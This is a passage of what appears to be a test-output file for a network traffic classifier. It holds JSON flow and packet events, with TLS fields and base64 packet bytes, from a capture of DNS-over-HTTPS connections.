QGJ+PRPScWQmM6JruXTVxzLP2v5t10WMRjAfhtdK+kbZwmOwuBqS0fXovjROfDM5rGu95fh\/DYXUBWZSAER"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739354159,"flow_last_seen":946739354179,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3114,"flow_tot_l4_payload_len":3399,"flow_avg_l4_payload_len":1699,"midstream":1,"thread_ts_msec":946739354179,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":946739354182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739354182,"pkt":"REREREREZmZmZmZmCABFAAB4sYBAAL0GQFYKAAABuetRAa5gAbtwXMQ7YngMcFAYAfXMEwAAFAMDAAEBFwMDAEWXq32pwHEzhcGDp\/NKLjvxgMAkksKxKcFIOFCDodEb90S6h8Gu0G\/BLuFfZ5sttQB7HESBT0tBjYEfHL61VthvR6QOjls="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":946739374011,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739374011,"pkt":"REREREREZmZmZmZmCABFAAFF9DpAAH4GIdcKAAABdMqwGqhiAbtWR3H7NJTy0VAYAfbm2AAAFgMBARgBAAEUAwO\/FCTCx\/QYlyW+S6EGE0TFYQ1H3k3FO+5pvJMM4NWMBSCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKpgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmxpYnJlZG5zLmdyAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIOxloY7MOWvSgZ3hQaojp9inJ84Sw+igf7hW9Y3pU+ch"} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7440000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7440000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7440000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjyvWV6dC+e+ksCIkxwJmTgcBQXwfuBwje22m5Cj2nv\/zq4aMsV7kiFOS1VcPYLEbw+c4UolvdLrBBCbMxCQZeGhjAzGdsZDuX\/6sRIGIbuHAE8nIh+KJ0joM4KoZNtLXSA2HqbNN+kRQ5gTFmAp4mqAOgsHxAv6V1xCZg8P3MEffeog7NEB4\/K8wtwtgVyjvZaZ4E5jbN5Fjj\/jqK88SEXhkPYnN+on2bA\/r\/BMBIaoCajkogUyGLoyIPMT+pBrWa+wfZKdLurwPxZw+jCxKJC0\/mmFBL81N3ktV2QA+uWulN8QPCd7cD0\/Hjf2QklIJga5shMEJkHY6px3Tk68O3abNmIreZ6S\/N71agsTVbVTSaRlprW4p5D79LYThW+q2zikyKF2eG4VtVQ1Z087sY8sCBmmZG8ETPN5Xq0TN3Q1mXCkwjS9y4DvkEf4d2VKsFN6yj110+kONDzC8lVgKicr46oqIhZ9cyUDwr5+MuFqHiF2KMvJx9XA7v9+a265RIEavlSRTRm3PXbeYNOWUADrJWXjguUacdKmikyCoiD9vRp7ll6YxsV5jSfRT\/9SmZeNE+aTDy2wakB7qY1oeeLE4kVchDyQa22zUAtVHOgOvTZInJYA\/takDFgegJnQaYWISVIejbCOHLLvY\/LGAj1CyqRrh1\/LJm06TJxFQn5cMNb